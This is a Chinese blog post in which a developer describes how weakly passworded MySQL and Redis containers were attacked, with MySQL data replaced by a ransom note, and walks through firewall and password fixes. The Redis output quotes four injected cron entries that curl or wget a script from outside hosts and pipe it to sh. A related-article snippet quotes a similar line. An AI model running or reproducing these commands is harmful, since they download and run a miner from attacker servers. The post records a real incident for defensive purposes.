记录Redis和MySQL被扫描注入攻击

最新推荐文章于 2024-04-24 21:30:40 发布
最新推荐文章于 2024-04-24 21:30:40 发布
阅读量1.2k 收藏
点赞数
分类专栏: 数据库 文章标签: redis mysql docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44610529/article/details/126173428
版权

私人服务器使用docker搭建MySQL和Redis的开发环境后没有很在意安全防护,直接使用123456这种弱密码的方式搭建的,最后被扫描攻击了。
MySQL连接后发现库里的数据都没了,出现了以下库,勒索要钱的:
请添加图片描述
Redis连接后key也都没了,出现了这几个东西,挖矿的:

> keys *
backup4
backup2
backup3
backup1
> get backup1
*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh
> get backup2
*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh
> get backup3
*/4 * * * * root curl -fsSL http://45.128.150.171/cleanfda/init.sh | sh
> get backup4
*/5 * * * * root wd1 -q -O- http://45.128.150.171/cleanfda/init.sh | sh

1、开启防火墙

使用docker stop 停掉相关容器

systemctl enable firewalld.service #开机自启防火墙
systemctl start firewalld #启动防火墙
systemctl status firewalld #查看防火墙状态

但是在检查状态的时候报了个这错误

firewalld.service - firewalld - dynamic firewall daemon
   Loaded: loaded (/usr/lib/systemd/system/firewalld.service; enabled; vendor preset: enabled)
   Active: active (running) since Fri 2022-08-05 10:44:05 CST; 2s ago
     Docs: man:firewalld(1)
 Main PID: 5929 (firewalld)
    Tasks: 2
   Memory: 33.4M
   CGroup: /system.slice/firewalld.service
           └─5929 /usr/bin/python2 -Es /usr/sbin/firewalld --nofork --nopid

Aug 05 10:44:04 ls-u7x6wtwe systemd[1]: Starting firewalld - dynamic firewall daemon...
Aug 05 10:44:05 ls-u7x6wtwe systemd[1]: Started firewalld - dynamic firewall daemon.
Aug 05 10:44:05 ls-u7x6wtwe firewalld[5929]: WARNING: AllowZoneDrifting is enabled. This is consi...ow.
Hint: Some lines were ellipsized, use -l to show in full.

修改配置,重启防火墙

#修改配置
vim /etc/firewalld/firewalld.conf
# 修改内容
AllowZoneDrifting=yes 改成 no
# 重启防火墙
systemctl restart firewalld

2、重新启动docker

重启防火墙之后需要重启docker,不然启动容器会报端口错误。

systemctl restart docker

3、删除旧镜像,创建新镜像并设置强密码

可以改一下密码重新用的,但是担心镜像里面已经被注入了一些脚本呀啥的,且没啥重要数据需要恢复。

docker stop 镜像id
docker rm 镜像id
# 创建MySQL镜像
docker run --name mysql \
-v /wecoding/tools/mysql/conf:/etc/mysql \
-v /wecoding/tools/mysql/data:/var/lib/mysql \
-p 3306:3306 \
-e MYSQL_ROOT_PASSWORD="新密码" \
--net=my-net --network-alias mysql \
-d mysql:5.7 --lower-case-table-names=1
#创建redis镜像
docker run \
-p 6379:6379 --name redis \
-v /wecoding/tools/redis:/etc/redis \
-v /wecoding/tools/redis/data:/data \
--net=my-net --network-alias redis \
-d redis:5.0 redis-server /etc/redis/redis.conf --appendonly yes
# 设置redis密码
docker exec -it redis redis-cli
config set requirepass 新密码
不锈钢机器猫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hack Redis via Python urllib HTTP Header Injection
4ct10n
06-16 6170
本篇文章带来的是python低版本的urllib 头部注入攻击目标为局域网内的Redis,结合着一道CTF实例,演示整个攻击过程
java+mysql学生及教师信息管理系统
06-22
- **数据验证**:在数据输入时进行验证,防止SQL注入攻击,确保用户输入的数据符合系统要求。 - **权限控制**:设定不同角色(如管理员、学生、教师)的权限,避免非法操作,保护数据安全。 6. **性能优化**: -...
记录第一次云服务器redis被黑
最新发布
m0_73520938的博客
04-24 215
redis里莫名奇妙被写入四个键值对,backup1,backup2,backup3,backup4,内容是奇奇怪怪的sh脚本:*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....(redis明明设置了密码.....)解决办法:设置更复杂的redis连接密码,安全组,防火墙。
Redis攻击纪实
程序员青菜学厨记
11-08 431
1、2017年时候测试环境安装的是Redis4.0版本(或者更低,记不太清了),默认安装6379端口可以远程访问,然后被黑了,被人家做为挖矿机,他们太狠了,一定要把我CPU耗尽,搞得别的程序都跑不了(这样别人不就发现了吗,不能控制CPU的占用情况吗?上周新来的同事分享Redis的原理和机制,想起2017年的时候测试环境Redis攻击,最后只能重新安装服务器,今天试验一把利用Redis漏洞进行攻击,只有理解了别人是怎么攻击的,才能更好地进行防范。注:忘记截屏了,重启了Redis,那个注入的key找不到了。
记一次小小的redis攻击
南浦
02-03 2065
一次redis攻击
记录一次redis漏洞攻击
陈浩然MC的博客
09-11 3180
服务器挖矿病毒的排查过程 事情起因:朋友的一台阿里云主机,登录特别卡,找我看看 这一看就感觉出问题了,机器特别卡,top看了一眼,cpu几乎是100%运行 但是奇怪的是用top命令完全看不出来哪个进程占用资源,当时的截图找不到了,这是第一次遇到这种情况,没有显示今晨占用资源,偏偏资源被跑满 排查 刚接手问题的时候我也是一脸闷逼,很奇怪,明明是没有进程占用的,为什么还会这样? ...
Redis的一些攻击手法整理
笑花大王
06-22 836
Redis基础 1 Redis基础 REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以...
企业生产MySQL优化介绍
09-09
数据库安全方面,禁止从外网访问数据库,限制文件权限,每个数据库对应特定用户,严格控制开发人员对生产库的操作权限,防止SQL注入攻击。 总的来说,企业生产环境下的MySQL优化是一个综合性的过程,涉及到硬件、...
数据库管理系统MySql(JSP版).rar_jsp mysql 系统_jsp管理系统_mysql jsp
09-19
在"数据库管理系统MySQL(JSP版)"中,JSP被用来作为前端展示和用户交互的工具,而MySQL则作为后台的数据存储和管理。这样的系统设计能够提供一个功能强大的Web应用程序,让用户可以通过浏览器进行数据的增删改查等...
php+mysql文章发布系统
07-04
1. **数据安全**:使用预处理语句防止SQL注入,对用户输入进行过滤和校验,避免XSS攻击。 2. **性能优化**:合理设计数据库索引,减少不必要的全表扫描;使用缓存技术(如Redis)减轻数据库压力;对静态资源进行压缩...
分享和记录常见的php面试题和面试技巧.zip
03-16
- MySQLi:与MySQL的交互,了解面向对象和面向过程两种模式。 - SQL查询优化:索引使用、避免全表扫描、JOIN操作优化。 4. **PHP框架**: - Laravel:路由、控制器、模型、视图、Blade模板引擎、Eloquent ORM、...
Redis攻击手法
网安君的博客
06-30 1208
REmote DIctionary Server(Redis) 是一个由 Salvatore Sanfilippo 写的 key-value 存储系统,是跨平台的非关系型数据库。Redis 是一个开源的使用 ANSI C 语言编写、遵守 BSD 协议、支持网络、可基于内存、分布式、可选持久性的键值对(Key-Value)存储数据库,并提供多种语言的 API。Redis 通常被称为数据结构服务器,因为值(value)可以是字符串(String)、哈希(Hash)、列表(list)、集合(sets)和有序集合(
又一数据库高危漏洞爆出,数据安全如何有效保障?
华为云官方博客
07-23 1424
摘要:2021年7月22日,Redis官方和开源Redis社区先后发布公告,披露了CVE-2021-32761 Redis(32位)远程代码执行漏洞。那么,对于此类数据库安全漏洞该如何防患于未然呢?
记一次redis服务器被攻击的体验
xyffly的博客
03-13 1441
前几天查看了自己的云服务器,发现被异常登录了,阿里云也发来了警告,赶紧登上去看了一下。        查看了一下检查/root/.ssh/下有没有秘钥文件,发现果然有一个公钥文件。                  先把他删除。1)禁止使用 root 权限启动 redis 服务2)对 redis 访问启用复杂密码认证,并且添加 IP 访问限制3)尽可能不对公网直接开放 SSH 服务4)并且关掉nt...
利用SSRF漏洞内网探测来攻击Redis(请求头CRLF方式)
Time Will Tell
09-25 1173
最近大致了解一下Redis记录一下关于Redis安全方面的内容 存在ssrf漏洞的站点主要利用四个协议,分别是http、file、gopher、dict协议。 SSRF 漏洞出现的场景 1.能够对外发起网络请求的地方,就可能存在 SSRF 漏洞 2.从远程服务器请求资源(Upload from URL,Import & Export RSS Feed) 3.数据库内置功能(Oracle、MongoDB、MSSQL、Postgres、CouchDB) 邮件协议(POP3、IMAP、
springboot拦截器中注入redis、service为null的问题
xxl802399的博客
12-26 577
注入为null的时候,是通过new的方式创建的拦截器,通过new出来的实例是没有交给spring进行管理的,没有被spring管理的实例,spring是无法自动注入bean的,所以为null。也看了一些其他人的解决办法,有说@Autowired换成@Resource的,或者替换Redistemplate的引用方法的,但是我都有试过都不是最终解决办法,本质还是加载顺序的问题。其原因是过滤器加载顺序是在springcontext创建之前的,,所以在拦截器中注入自然就为null。
Redis的初步搭建及被入侵经历
dobat的博客
05-31 3859
越来越觉得Redis的火热,同时日常开发中迫切需要用到,所以赶紧来充充电吧。网上非常详细的介绍了Redis的来源、特点、数据结构、应用场景等。在这里仅以一个新接触的入门者来自我总结下,Redis可以理解为以内存作为数据存储介质,因此读写效率极高,相比较于传统的关系数据库,如Mysql,非常适合存储读取频繁使用的数据。同时实现了持久化,不用担心数据丢失,支持多种数据结构,主从模式、配置集群什么的当然...
Redis攻击方法总结
Docker的专栏
08-11 1212
Redis是什么?Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可...
redismysql
07-28
RedisMySQL在业务中有不同的功能和使用场景。Redis主要用于缓存数据,数据基本上是在内存中操作,以提高读取速度和性能。而MySQL则是一种关系型数据库,数据存储在磁盘中。在web应用中,一般采用MySQL+Redis的方式...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值